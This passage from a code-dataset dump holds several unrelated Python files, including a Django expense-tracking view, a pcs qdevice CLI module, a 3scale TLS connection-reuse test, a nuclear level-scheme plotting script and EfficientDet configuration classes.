{gasto_seleccionado.transporte} °°'],\n [Paragraph('Personal:', style_body), f'Q. {gasto_seleccionado.personal} °°'],\n [Paragraph('Combustible:', style_body), f'Q. {gasto_seleccionado.combustible} °°'],\n [Paragraph('Alquiler:', style_body), f'Q. {gasto_seleccionado.alquiler} °°'],\n [Paragraph('Viáticos:', style_body), f'Q. {gasto_seleccionado.viaticos} °°'],\n [Paragraph('Donaciones:', style_body), f'Q. {gasto_seleccionado.donaciones} °°'],\n [Paragraph('Otros:', style_body), f'Q. {gasto_seleccionado.otros} °°'],\n [Paragraph('Total Gastado:', style_body), f'Q. {gasto_seleccionado.residuo} °°'],\n [Paragraph('Sobrante:', style_body), f'Q. {gasto_seleccionado.totalgastado} °°'],\n ]\n\n elements.append(Paragraph(f'Fecha de Impresión: {fecha_actual}'))\n elements.append(Paragraph('_'))\n\n table = Table(content)\n table.setStyle(TableStyle([\n ('BACKGROUND', (0, 0), (-1, 0), colors.grey),\n ('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),\n ('ALIGN', (0, 0), (-1, -1), 'CENTER'),\n ('FONTNAME', (0, 0), (-1, 0), 'Helvetica'),\n ('BOTTOMPADDING', (0, 0), (-1, 0), 12),\n ('BACKGROUND', (0, 1), (-1, -1), colors.beige),\n ('GRID', (0, 0), (-1, -1), 1, colors.black)\n ]))\n\n elements.append(table)\n\n doc.build(elements)\n\n return response\n\n#Lista los Eventos ya creados en la base de datos\n@login_required(login_url=\"auth/login/\")\ndef list_gastos(request):\n query = request.GET.get('q', '')\n gastos = gasto.objects.filter( \n Q(eventoa__titulo__icontains=query) \n )\n context = {\n \"active_icon\": \"gastos\",\n \"gastos\":gastos,\n \"query\": query,\n }\n return render(request, \"gasto/gastos.html\", context)\n\n\n\n\n\n\n@login_required(login_url=\"auth/login/\")\ndef eliminar_gastos(request, gasto_id):\n try:\n Gasto = gasto.objects.get(pk=gasto_id)\n Gasto.delete()\n messages.success(request, '¡Gasto eliminado!', extra_tags=\"success\")\n return redirect('gastos:list_gasto') \n except Exception as e:\n messages.error(request, '¡Hubo un error durante la eliminación!' 
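# A minimal self-contained sketch of the ReportLab pattern generar_pdf_gasto()
# uses above: a SimpleDocTemplate built from a list of flowables, including a
# Table with a TableStyle. Output file name and cell values are invented.
from reportlab.lib import colors
from reportlab.lib.pagesizes import landscape, letter
from reportlab.platypus import SimpleDocTemplate, Table, TableStyle

doc = SimpleDocTemplate("demo.pdf", pagesize=landscape(letter))
table = Table([["Concepto", "Monto"], ["Transporte", "Q. 100"]])
table.setStyle(TableStyle([
    ("BACKGROUND", (0, 0), (-1, 0), colors.grey),
    ("GRID", (0, 0), (-1, -1), 1, colors.black),
]))
doc.build([table])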
+ str(e), extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n \n\n\n\n\n\n#Agrega a la base de datos los Eventos, funcion para insertar \n@login_required(login_url=\"auth/login/\")\ndef agregar_gasto(request):\n eventos = evento.objects.all()\n\n if request.method == 'POST':\n data = request.POST\n\n evento_id = data.get('evento')\n\n # Verificar si ya existe un gasto asociado al evento\n if gasto.objects.filter(eventoa__id=evento_id).exists():\n messages.error(request, 'Ya existe un gasto registrado para este evento.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n\n # Elimina \"Q.\" de los valores ingresados\n presupuesto = re.sub(r'[^\\d.]', '', data.get('presupuesto'))\n transporte = re.sub(r'[^\\d.]', '', data.get('transporte'))\n personal = re.sub(r'[^\\d.]', '', data.get('personal'))\n combustible = re.sub(r'[^\\d.]', '', data.get('combustible'))\n alquiler = re.sub(r'[^\\d.]', '', data.get('alquiler'))\n viaticos = re.sub(r'[^\\d.]', '', data.get('viaticos'))\n donaciones = re.sub(r'[^\\d.]', '', data.get('donaciones'))\n otros = re.sub(r'[^\\d.]', '', data.get('otros'))\n\n # Validación de los valores ingresados\n if not presupuesto or \\\n not transporte or \\\n not personal or \\\n not combustible or \\\n not alquiler or \\\n not viaticos or \\\n not donaciones or \\\n not otros:\n messages.error(request, 'Los valores ingresados deben ser numéricos.', extra_tags=\"danger\")\n return redirect('gastos:gastos')\n\n # Convertir los valores a números de punto flotante\n presupuesto = float(presupuesto)\n transporte = float(transporte)\n personal = float(personal)\n combustible = float(combustible)\n alquiler = float(alquiler)\n viaticos = float(viaticos)\n donaciones = float(donaciones)\n otros = float(otros)\n\n evento_obj = evento.objects.get(pk=evento_id)\n\n # Calcula el totalgastado y residuo\n totalgastado = presupuesto - (transporte + personal + combustible + alquiler + viaticos + donaciones + otros)\n residuo = presupuesto - totalgastado\n\n nuevo_evento = gasto(\n eventoa=evento_obj,\n presupuesto=presupuesto,\n transporte=transporte,\n personal=personal,\n combustible=combustible,\n alquiler=alquiler,\n viaticos=viaticos,\n donaciones=donaciones,\n otros=otros,\n totalgastado=totalgastado,\n residuo=residuo\n )\n nuevo_evento.save()\n\n messages.success(request, 'Gasto creado con éxito!', extra_tags=\"success\")\n return redirect('gastos:gastos')\n\n return render(request, \"gasto/agregar_gasto.html\", {\n 'eventos': eventos,\n })\n\n\n\n\n\n\n\n\n\n\n\n#Actualiza un gasto de un evento realizado en la mezquita aldaawa\n@login_required(login_url=\"auth/login/\")\ndef actualizar_gasto(request, gasto_id):\n eventos = evento.objects.all()\n\n try:\n gasto_obj = gasto.objects.get(pk=gasto_id)\n\n if request.method == 'POST':\n data = request.POST.copy() # Crea una copia mutable de request.POST\n\n evento_id = data.get('evento')\n\n if gasto_obj.eventoa.id != int(evento_id):\n # Verifica si ya existe un gasto asociado al nuevo evento\n if gasto.objects.filter(eventoa__id=evento_id).exclude(id=gasto_obj.id).exists():\n messages.error(request, 'Ya existe un gasto registrado para este evento.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n\n evento_obj = evento.objects.get(pk=evento_id)\n gasto_obj.eventoa = evento_obj\n\n # Reemplaza comas con puntos en los valores\n for key in ['presupuesto', 'transporte', 'personal', 'combustible', 'alquiler', 'viaticos', 'donaciones', 'otros']:\n data[key] = data[key].replace(',', '.')\n\n # 
Validación y conversión de valores a Decimal\n try:\n presupuesto = Decimal(data.get('presupuesto'))\n transporte = Decimal(data.get('transporte'))\n personal = Decimal(data.get('personal'))\n combustible = Decimal(data.get('combustible'))\n alquiler = Decimal(data.get('alquiler'))\n viaticos = Decimal(data.get('viaticos'))\n donaciones = Decimal(data.get('donaciones'))\n otros = Decimal(data.get('otros'))\n\n # Calcula el totalgastado y residuo\n totalgastado = presupuesto - (transporte + personal + combustible + alquiler + viaticos + donaciones + otros)\n residuo = presupuesto - totalgastado\n\n # Asigna los valores calculados\n gasto_obj.presupuesto = presupuesto\n gasto_obj.transporte = transporte\n gasto_obj.personal = personal\n gasto_obj.combustible = combustible\n gasto_obj.alquiler = alquiler\n gasto_obj.viaticos = viaticos\n gasto_obj.donaciones = donaciones\n gasto_obj.otros = otros\n gasto_obj.totalgastado = totalgastado\n gasto_obj.residuo = residuo\n except Exception as e:\n messages.error(request, 'Los valores ingresados deben ser numéricos.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n\n gasto_obj.save()\n\n messages.success(request, 'Gasto actualizado con éxito!', extra_tags=\"success\")\n return redirect('gastos:list_gasto')\n\n return render(request, \"gasto/actualizar_gasto.html\", {\n 'gasto': gasto_obj,\n 'eventos': eventos,\n })\n\n except gasto.DoesNotExist:\n messages.error(request, 'El gasto que intentas actualizar no existe.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n except evento.DoesNotExist:\n messages.error(request, 'El evento asociado no existe.', extra_tags=\"danger\")\n return redirect('gastos:list_gasto')\n except Exception as e:\n messages.error(request, 'Error al actualizar el gasto: ' + str(e), extra_tags=\"danger\")\n return redirect('gastos:list_gasto')","repo_name":"DarioRodriguezSa/comunidad","sub_path":"proyecto/gastos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32943461883","text":"import os\nfrom datetime import datetime\nimport pandas as pd\n\n\ndef combine_all_summaries():\n date = datetime.today().strftime('%Y-%m-%d')\n summary_dir = 'Database_Summaries'\n\n # Load the summary files\n main_file = os.path.join(summary_dir, 'Summarized_Material_DB_' + date + '.csv')\n mech_file = os.path.join(summary_dir, 'Summarized_Mechanical_Props_Individual_' + date + '.csv')\n chem_file = os.path.join(summary_dir, 'Summarized_Chemical_Composition_' + date + '.csv')\n main_summary = pd.read_csv(main_file, index_col=0)\n mechanical_summary = pd.read_csv(mech_file, index_col=0)\n chemical_summary = pd.read_csv(chem_file)\n\n # Columns to keep in each\n mech_cols = ['citekey', 'Yield Stress [MPa]', 'Elastic Modulus [MPa]', 'Fracture Strain']\n chem_cols = ['C', 'Si', 'Mn', 'P', 'S', 'N', 'Cu', 'Mo', 'Ni',\n 'Cr', 'V', 'Nb', 'Ti', 'Al', 'B', 'Zr', 'Sn', 'Ca', 'H', 'Fe']\n\n # DB tag to directories to map chemical compositions\n tag_dir_map = pd.read_csv('Clean_Data/db_tag_clean_data_map.csv', header=None, names=['ind', 'cpath'])\n cpath = [os.path.normpath(p) for p in tag_dir_map['cpath']]\n cpath = [os.sep.join(p.split(os.sep)[1:-1]) for p in cpath]\n # Create chem comps list\n chem_comps = {}\n for i, cp in enumerate(cpath):\n for j, chem_row_j in enumerate(chemical_summary['cpath']):\n if cp in chem_row_j:\n chem_comps[tag_dir_map.iloc[i]['ind']] = 
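# A worked instance of the sanitising idiom agregar_gasto() above applies
# before float(): strip everything except digits and the decimal point.
# Note the character class keeps '.', so an input such as "Q. 100" would
# leave a leading dot behind; the sample value avoids that case.
import re

raw = "Q 1,234.50"
clean = re.sub(r"[^\d.]", "", raw)
assert clean == "1234.50" and float(clean) == 1234.5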
chemical_summary.iloc[j][chem_cols]\n break\n chem_comp_df = pd.DataFrame.from_dict(chem_comps, orient='index')\n\n # Combine all the data\n tag_map_2 = tag_dir_map.set_index('ind', drop=True)\n tag_map_2['cpath'] = tag_map_2['cpath'].apply(os.path.normpath)\n main_summary[mech_cols] = mechanical_summary[mech_cols]\n main_summary[chem_cols] = chem_comp_df[chem_cols]\n main_summary['file'] = tag_map_2['cpath']\n # Rename the columns and save to csv\n cols = main_summary.columns\n rename_dict = {}\n for c in cols:\n rename_dict[c] = c.lower().replace('.', '').replace('[', '_').replace(']', '_').replace(' ', '_')\n main_summary = main_summary.rename(rename_dict, axis='columns')\n main_summary.to_csv(os.path.join(summary_dir, 'Overall_Summary_' + date + '.csv'), index_label='hidden_index')\n\n\nif __name__ == \"__main__\":\n combine_all_summaries()\n","repo_name":"ahartloper/rlmtp","sub_path":"Database_Management/combine_all_summaries.py","file_name":"combine_all_summaries.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32527630922","text":"from pcs.cli.common.errors import CmdLineInputError\n\n\ndef qdevice_status_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --full - get more detailed output\n \"\"\"\n modifiers.ensure_only_supported(\"--full\")\n if not argv or len(argv) > 2:\n raise CmdLineInputError()\n model = argv[0]\n cluster = None if len(argv) < 2 else argv[1]\n print(\n lib.qdevice.qdevice_status_text(\n model,\n verbose=modifiers.get(\"--full\"),\n cluster=cluster,\n )\n )\n\n\ndef qdevice_setup_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --enable - enable qdevice service\n * --start - start qdevice service\n \"\"\"\n modifiers.ensure_only_supported(\"--enable\", \"--start\")\n if len(argv) != 2:\n raise CmdLineInputError()\n if argv[0] != \"model\":\n raise CmdLineInputError()\n model = argv[1]\n lib.qdevice.qdevice_setup(\n model, modifiers.get(\"--enable\"), modifiers.get(\"--start\")\n )\n\n\ndef qdevice_destroy_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --force - destroy qdevice even if it is used by clusters\n \"\"\"\n modifiers.ensure_only_supported(\"--force\")\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_destroy(model, proceed_if_used=modifiers.get(\"--force\"))\n\n\ndef qdevice_start_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_start(model)\n\n\ndef qdevice_stop_cmd(lib, argv, modifiers):\n \"\"\"\n Options:\n * --force - stop qdevice even if it is used by clusters\n \"\"\"\n modifiers.ensure_only_supported(\"--force\")\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_stop(model, proceed_if_used=modifiers.get(\"--force\"))\n\n\ndef qdevice_kill_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_kill(model)\n\n\ndef qdevice_enable_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n raise CmdLineInputError()\n model = argv[0]\n lib.qdevice.qdevice_enable(model)\n\n\ndef qdevice_disable_cmd(lib, argv, modifiers):\n \"\"\"\n Options: no options\n \"\"\"\n modifiers.ensure_only_supported()\n if len(argv) != 1:\n 
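# A worked instance of the path-trimming expression above: normalise, split
# on os.sep, drop the first and last components, and rejoin. The path is
# illustrative only.
import os

p = os.path.normpath(os.path.join("Clean_Data", "S355", "batch1", "specimen.csv"))
middle = os.sep.join(p.split(os.sep)[1:-1])
assert middle == os.sep.join(["S355", "batch1"])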
raise CmdLineInputError()\n    model = argv[0]\n    lib.qdevice.qdevice_disable(model)\n","repo_name":"ClusterLabs/pcs","sub_path":"pcs/qdevice.py","file_name":"qdevice.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"19"}
+{"seq_id":"39699076941","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('lessons', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.RenameField(\n            model_name='course',\n            old_name='date',\n            new_name='date_created',\n        ),\n    ]\n","repo_name":"sjstone2838/deepdive","sub_path":"lessons/migrations/0002_auto_20160102_1804.py","file_name":"0002_auto_20160102_1804.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"10011709530","text":"\"\"\"\nTests that the SSL connection is not reused for different backends.\nTests that when the backends are connected with OpenShift routes using the passthrough TLS policy,\nthe first established connection is not reused for all requests to the same IP, that being\nthe OpenShift HAProxy router, and the requests are routed to the appropriate backend.\n\"\"\"\n\nimport pytest\n\nfrom packaging.version import Version # noqa # pylint: disable=unused-import\nfrom testsuite import TESTED_VERSION # noqa # pylint: disable=unused-import\nfrom testsuite.echoed_request import EchoedRequest\n\npytestmark = [\n    pytest.mark.skipif(\"TESTED_VERSION < Version('2.11')\"),\n    pytest.mark.issue(\"https://issues.redhat.com/browse/THREESCALE-6849\")]\n\n\n@pytest.fixture(scope=\"module\")\ndef authority_and_code(valid_authority):\n    \"\"\"\n    Returns the authority for httpbin and the return code it should return.\n    For testing connection reuse, a single valid authority is sufficient.\n    \"\"\"\n    return valid_authority, 200\n\n\n# pylint: disable=unused-argument\ndef test_connection_reuse(api_client, mapping_rules):\n    \"\"\"\n    - Have two backend httpbins with TLS enabled and with TLS passthrough routes.\n    - Have a product in 3scale with two backends with different mapping rules\n      whose upstream APIs are the httpbins.\n    - Have the mTLS policy between APIcast and the backend APIs established.\n    - Send requests routed to the first and second backend, to the '/info' httpbin endpoint,\n      which returns the information about the httpbin.\n    - Assert that each request got routed to the appropriate backend using the information returned\n      in the '/info' request (info['tls']['ServerName']).\n      (The second request should not use the established TLS connection between the APIcast and\n      the first backend)\n\n    \"\"\"\n    client = api_client()\n\n    response_orig = client.get(\"/orig/info\")\n    response_new = client.get(\"/new/info\")\n\n    assert response_orig.status_code == 200\n    assert response_new.status_code == 200\n\n    info_orig = EchoedRequest.create(response_orig)\n    info_new = EchoedRequest.create(response_new)\n\n    assert info_orig.json['tls']['ServerName'] != info_new.json['tls']['ServerName']\n","repo_name":"mijaros/3scale-tests","sub_path":"testsuite/tests/apicast/policy/tls/tls_upstream/tls_passthrough_connection_reuse/test_connection_reuse.py","file_name":"test_connection_reuse.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
+{"seq_id":"24407368347","text":"\"\"\"\nA module 
with functions for making plots of level schemes,\nmanually (for once you have your data but just want to plot it).\n\nEither single or multi-scheme plots are possible, and we make output in\ntwo different formats.\n\nThe one with a .png extension is a standard image file\n\nThe one with a .svg extension is also an image file, but saved in\nScalable Vector Graphics format, which means it is more easily editable.\nTo open / edit that file, may I recommend `Inkscape `_?\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport matplotlib as mpl\nfrom matplotlib.ticker import MultipleLocator\n\nimport utils\n\nmpl.rcParams['lines.linewidth'] = '10'\nmpl.rcParams['axes.linewidth'] = '10'\nmpl.rcParams['lines.dashed_pattern'] = (7, 2)\nmpl.rcParams['lines.dotted_pattern'] = (1, 1.65)\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\nplt.rcParams[\"font.weight\"] = \"bold\"\nplt.rc('text', usetex=True)\nplt.rc('font', size=16)\n# general plot formatting\nplt.style.use('seaborn-white')\n\n\naxis_label_size = 50\n\n# we'll pick colors from this list\n# green blue red\ncolors = ['#7FC97F', '#2E9EDE', '#F80C00', None, None]\n\ncmap = plt.get_cmap('viridis')\n\ndpi_high_res = 200\n\n# dimensions of individual spectrum plots\nx_size = 5\ny_size = 7\n\n# x axis bounds, definitely don't change these unless you're feeling rebellious\nmin_x = 0\nmax_x = 10\n\nenergies_list = [\n [-2.76, -0.98, 0.90, 1.82, 2.79],\n [-2.94, -1.09, 0.69, 1.53, 2.30],\n [-2.81, -1.14, 0.67, 1.41, 2.65],\n [-4.07, -1.37, 0.23, 1.37, 2.62],\n [-4.06, -1.37, 0.23, 1.32, 2.62],\n]\n\nwidths_list = [\n [0, 0, 1.04, 1.16, 5.11],\n [0, 0, 0.66, 0.75, 3.91],\n [0, 0, 0.56, 0.59, 2.50],\n [0, 0, 0.11, 0.61, 2.50],\n [0, 0, 0.10, 0.60, 0.00],\n]\n\n# strings of the form ``J_parity_T[_column]`` (the _column is optional).\nchannel_title_list = [\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"1.5_-_1.5\", \"1.5_-_1.5\", \"2.5_-_1.5\", \"0.5_-_1.5\", \"1.5_-_1.5\"],\n [\"?_?_?\", \"?_?_?\", \"2.5_-_?\", \"0.5_-_?\", \"1.5_-_1.5\"],\n]\n\nmain_title_list = [\n \"$4\\\\hbar\\\\Omega$\",\n \"$6\\\\hbar\\\\Omega$\",\n \"$8\\\\hbar\\\\Omega$\",\n \"$8\\\\hbar\\\\Omega$ $\\\\textrm{Pheno}$\",\n \"$\\\\textrm{Experiment}$\",\n]\n\ndef linewidth_from_data_units(linewidth, axis, reference='y'):\n \"\"\"\n Convert a linewidth in data units to linewidth in points.\n (many thanks to stack exchange!)\n\n linewidth:\n float, how big you want your line to be, in data units\n\n axis:\n axis object on which your graph is made\n\n reference:\n string, x or y, which axis data units?\n \"\"\"\n\n fig = axis.get_figure()\n if reference == 'x':\n length = fig.bbox_inches.width * axis.get_position().width\n value_range = np.diff(axis.get_xlim())\n elif reference == 'y':\n length = fig.bbox_inches.height * axis.get_position().height\n value_range = np.diff(axis.get_ylim())\n # Convert length to points\n length *= 72\n # Scale linewidth to value range\n return linewidth * (length / value_range)\n\n\ndef plot_levels(energies, widths, channel_titles, main_title,\n min_y, max_y, ax=None, y_label=\"E [MeV]\",\n colors=None):\n \"\"\"\n Makes a plot of a single level scheme.\n\n energies:\n list of floats, energies to plot\n\n widths:\n list of floats, widths to plot\n\n channel_titles:\n list of strings, text to be placed beside levels\n\n 
main_title:\n main plot title, usually something like 2\\\\hbar\\\\Omega\n\n min_y, max_y:\n two floats, if a width would go outside these bounds, we cut it off\n\n ax:\n matplotlib axis object on which we wish to make this plot.\n If you're just making a single plot there's no need to worry about this\n it's just useful if you're putting multiple ones on the same figure.\n\n y_label:\n string, label for the y axis\n\n colors:\n colors for each level's width, in any matplotlib-compatible format\n\n \"\"\"\n # set up plot\n if ax is None:\n _, ax = plt.subplots(figsize=(x_size, y_size))\n\n # Add titles\n for axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(3)\n ax.set_title(\n \"{}\".format(main_title), loc='center', pad=15,\n fontsize=axis_label_size, fontweight=20, color='black', fontname='Times New Roman')\n ax.set_xlabel(\"\")\n ax.set_ylabel(y_label, fontsize=axis_label_size, fontname='Times New Roman')\n ax.set_xticks([])\n ax.yaxis.set_minor_locator(MultipleLocator(0.25))\n ax.yaxis.set_major_locator(MultipleLocator(2))\n ax.tick_params(axis=\"y\", which='both', left=True, right=False, labelsize=50)\n ax.tick_params(which='both', direction='in', length=18, width=3)\n ax.tick_params(which='minor', length=9, width=2)\n x = np.linspace(min_x, 0.7*max_x, num=len(energies), endpoint=True).tolist()\n x_inc = x[1] - x[0]\n\n # plot dotted line at zero energy\n ax.plot([min_x-5, max_x+5], [0, 0], 'k--', linewidth=3,\n solid_capstyle=\"butt\", alpha=0.3, dashes=(2,2))\n\n # plot each energy line with a bar around it depending on width\n # also add titles for energy, state label, width\n energies = np.array(energies)\n widths = np.array(widths)\n idx = list(reversed(np.argsort(energies)))\n energies = energies[idx]\n widths = widths[idx]\n\n for i in range(len(energies)):\n # make an initial skinny plot for each energy value\n ax.plot(x, [energies[i]]*len(x),\n marker='', color='k', linewidth=3, alpha=1,\n solid_capstyle=\"butt\")\n\n # figure out if this energy's width will fit on the plot\n top = energies[i] + widths[i] / 2\n btm = energies[i] - widths[i] / 2\n\n # x value of the middle of this point\n x_mid = 1.15 * (x[i] + x_inc / 2) + 0.4\n\n if energies[i] < 0: # bound state\n ax.plot(x, [energies[i]]*len(x), marker='', color=\"black\",\n linewidth=1, alpha=1, solid_capstyle=\"butt\")\n else: # typical resonance where the width bars will fit\n x_width = 1.5*linewidth_from_data_units(x_inc, ax, reference=\"x\")\n ax.plot([x_mid, x_mid], [top, btm], marker='', color=colors[i],\n linewidth=x_width, alpha=1, solid_capstyle='butt')\n \n # state info (J, pi, T, in the form J^p T) title\n plot_title = utils.plot_title_2(channel_titles[i])\n ax.text(9, energies[i]+0.4, plot_title,\n horizontalalignment='center', fontsize=40, color='black',\n verticalalignment='center')\n\ndef plot_multi_levels(energies_list, widths_list, channel_title_list,\n main_title_list):\n \"\"\"\n Make plots of many different schemes, stiched together into one figure.\n\n energies_list:\n list of list of floats, energies of each channel on each plot\n\n widths_list:\n list of list of floats, widths of each channel on each plot\n\n channel_title_list:\n list of list of strings, titles of each channel on each plot\n\n main_title_list:\n list of strings, main titles of each plot\n \"\"\"\n n_spectra = len(energies_list)\n n_lines = max([len(e) for e in energies_list])\n\n # make main figure\n _, axes = plt.subplots(\n nrows=1, ncols=n_spectra, sharex=True, sharey=True,\n figsize=(x_size*n_spectra, 
y_size))\n if type(axes) != np.ndarray:\n axes = [axes]\n\n max_energy = max([max(e) for e in energies_list])\n min_energy = min([min(e) for e in energies_list])\n\n # we'll cut the resonance widths off depending on \"factor\"\n factor = 0.2\n max_y = max_energy + factor * abs(max_energy-min_energy)\n min_y = min_energy - factor * abs(max_energy-min_energy)\n # plot each individual spectrum\n for ax, e, w, ct, mt in zip(axes, energies_list, widths_list,\n channel_title_list, main_title_list):\n plot_levels(\n e, w, ct, mt, min_y, max_y, ax=ax, y_label=\"\", colors=colors)\n\n # set x limits\n plt.xlim(min_x-1, max_x+1)\n # set y limits\n plt.ylim(-4.5, 5)\n\n # put title only on the first one\n axes[0].set_ylabel(\"$E$ $\\\\textrm{[MeV]}$\", fontsize=axis_label_size)\n\n # then save the plot\n if not os.path.exists(\"level_schemes\"):\n os.mkdir(\"level_schemes\")\n fig_path = os.path.join(\"level_schemes\", \"level_scheme\")\n plt.tight_layout()\n plt.savefig(fig_path+\".png\", dpi=dpi_high_res)\n plt.savefig(fig_path+\".svg\")\n plt.savefig(fig_path+\".pdf\")\n print(\"Saved level scheme plot as\", fig_path+\".png\")\n\nplot_multi_levels(energies_list, widths_list, channel_title_list, main_title_list)\n\n","repo_name":"callum-mccracken/ncsmc_python","sub_path":"scheme_plot_manual.py","file_name":"scheme_plot_manual.py","file_ext":"py","file_size_in_byte":8788,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"37539574436","text":"from typing import Tuple, List, Literal, Optional\n\nfrom comvex.utils import ConfigBase, EfficientNetBackboneConfig, BiFPNConfig\n\n\nclass EfficientDetBackboneConfig(ConfigBase):\n def __init__(\n self,\n efficientnet_backbone_config: EfficientNetBackboneConfig,\n image_shapes: Tuple[int],\n bifpn_num_layers: int,\n bifpn_channel: int,\n dimension: int = 2,\n upsample_mode: Literal[\"nearest\", \"linear\", \"bilinear\", \"bicubic\", \"trilinear\"] = \"nearest\",\n use_bias: bool = True,\n use_conv_after_downsampling: bool = True,\n norm_mode: Literal[\"fast_norm\", \"softmax\", \"channel_fast_norm\", \"channel_softmax\"] = \"fast_norm\",\n batch_norm_epsilon: float = 1e-5,\n batch_norm_momentum: float = 1e-1,\n feature_map_indices: Optional[List[int]] = None\n ) -> None:\n super().__init__()\n\n self.efficientnet_backbone_config = efficientnet_backbone_config\n self.image_shapes = image_shapes\n\n bifpn_config = BiFPNConfig(\n bifpn_num_layers=bifpn_num_layers,\n bifpn_channel=bifpn_channel,\n channels_in_nodes=[],\n shapes_in_nodes=[],\n dimension=dimension,\n upsample_mode=upsample_mode,\n use_bias=use_bias,\n use_conv_after_downsampling=use_conv_after_downsampling,\n norm_mode=norm_mode,\n batch_norm_epsilon=batch_norm_epsilon,\n batch_norm_momentum=batch_norm_momentum,\n )\n for name, value in bifpn_config.__dict__.items():\n if not name in [\"channels_in_nodes\", \"shapes_in_nodes\"]: # These will be handled automatically in `EfficientDetBackbone`\n setattr(self, name, value)\n \n self.feature_map_indices = feature_map_indices\n\n @classmethod\n def D0(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B0(resolution=512, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (512, 512),\n 3,\n 64,\n **kwargs\n )\n \n @classmethod\n def D1(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B1(resolution=640, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (640, 
640),\n 4,\n 88,\n **kwargs\n )\n\n @classmethod\n def D2(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B2(resolution=768, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (768, 768),\n 5,\n 112,\n **kwargs\n )\n\n @classmethod\n def D3(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B3(resolution=896, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (896, 896),\n 6,\n 120,\n **kwargs\n )\n\n @classmethod\n def D4(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B4(resolution=1024, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1024, 1024),\n 7,\n 224,\n **kwargs\n )\n\n @classmethod\n def D5(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B5(resolution=1280, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1280, 1280),\n 7,\n 288,\n **kwargs\n )\n\n @classmethod\n def D6(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B6(resolution=1280, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1280, 1280),\n 8,\n 384,\n **kwargs\n )\n\n @classmethod\n def D7(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B6(resolution=1536, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1536, 1536),\n 8,\n 384,\n **kwargs\n )\n\n @classmethod\n def D7x(cls, **kwargs) -> \"EfficientDetBackboneConfig\":\n return cls(\n EfficientNetBackboneConfig.B7(resolution=1536, strides=[1, *([2]*7), 1]), # EfficientDet uses stride=2 from stage 2 to 8\n (1536, 1536),\n 8,\n 384,\n **kwargs\n )\n\n \nclass EfficientDetObjectDetectionConfig(ConfigBase):\n def __init__(\n self,\n efficientdet_backbone_config: EfficientDetBackboneConfig,\n num_pred_layers: int,\n num_classes: int,\n num_anchors: int,\n use_seperable_conv: bool = True,\n path_dropout: float = 0.,\n ) -> None:\n super().__init__()\n\n self.efficientdet_backbone_config = efficientdet_backbone_config\n 